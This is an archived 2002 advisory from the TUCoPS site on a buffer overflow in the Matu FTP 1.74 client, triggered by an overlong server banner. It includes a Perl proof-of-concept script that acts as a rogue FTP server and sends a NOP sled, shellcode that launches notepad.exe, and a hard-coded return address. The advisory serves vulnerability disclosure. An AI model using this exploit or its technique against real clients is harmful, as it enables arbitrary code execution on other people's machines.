Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5303.htm

Matu FTP remote root exploit



23th Apr 2002 [SBWID-5303]
COMMAND

	Matu FTP remote root exploit

SYSTEMS AFFECTED

	Matu FTP Version 1.74

PROBLEM

	Kanatoko [http://www.jumperz.net/] found :
	

	

	The buffer overflow occurs when a long string like
	

	220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

	

	is received by Matu FTP  in  the  beginning  of  an  FTP  session.  This
	vulnerability allows malicious FTP server to execute an  arbitrary  code
	on client hosts.
	

	This exploit code is invoked as an FTP server through inetd.
	

	#!/usr/local/bin/perl

	

	#------------------------------------------------------

	# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)

	# ( run under inetd )

	# written by Kanatoko <anvil@jumperz.net>

	# http://www.jumperz.net/

	#------------------------------------------------------

	$|=1;

	

	        #egg written by UNYUN (http://www.shadowpenguin.org/)

	$egg  = \"\\xEB\\x27\\x8B\\x34\\x24\\x33\\xC9\\x33\\xD2\\xB2\";

	$egg .= \"\\x0B\\x03\\xF2\\x88\\x0E\\x2B\\xF2\\xB8\\xAF\\xA7\";

	$egg .= \"\\xE6\\x77\\xB1\\x05\\xB2\\x04\\x2B\\xE2\\x89\\x0C\";

	$egg .= \"\\x24\\x2B\\xE2\\x89\\x34\\x24\\xFF\\xD0\\x90\\xEB\";

	$egg .= \"\\xFD\\xE8\\xD4\\xFF\\xFF\\xFF\";

	$egg .= \"notepad.exe\";

	

	        #egg_address = 0x0012F43C

	$buf = \"\\x90\" x 217;

	$buf .= $egg;

	$buf .= \"A\" x 2;

	$buf .= \"\\x3C\\xF4\\x12\\x00\";

	$buf .= \"B\" x 80;

	

	print \"220 $buf\\r\\n\";

	

SOLUTION

	None yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH